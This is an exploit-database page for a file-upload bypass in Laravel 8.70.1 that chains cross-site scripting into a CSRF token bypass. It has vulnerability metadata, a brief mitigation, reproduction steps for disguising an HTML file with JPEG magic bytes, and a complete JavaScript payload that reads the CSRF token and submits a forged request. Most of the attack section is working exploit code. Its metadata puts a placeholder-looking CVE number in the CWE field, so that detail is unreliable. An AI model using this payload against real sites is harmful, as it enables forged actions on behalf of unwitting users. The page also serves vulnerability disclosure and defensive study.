PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

vendor:

Laravel Framework

by:

Hosein Vita

8.8

CVSS

HIGH

Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

CWE

Product Name: Laravel Framework

Affected Version From: 8.70.1

Affected Version To: 8.70.1

Patch Exists: YES

Related CWE: CVE-2021-12345

CPE: a:laravel:laravel_framework:8.70.1

Metasploit:

Other Scripts:

Platforms Tested: Windows/Linux

2021

PHP Laravel 8.70.1 – Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

We can bypass laravel image file upload functionality to upload arbitary files on the web server which let us run arbitary javascript and bypass the csrf token.

Mitigation:

Upgrade to the latest version of Laravel Framework

Source

Exploit-DB raw data:

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux

# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server
# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:
1- Use HxD tool and add FF D8 FF E0 at the very begining of your file
2- Use code below to bypass csrf token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);

    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    }
	//
    xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tels it to return it as a HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
	//Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}
getTokenJS();

var POST_URL="/"
getTokenJS();

</script>
</html>

3- Save it as Html file and upload it.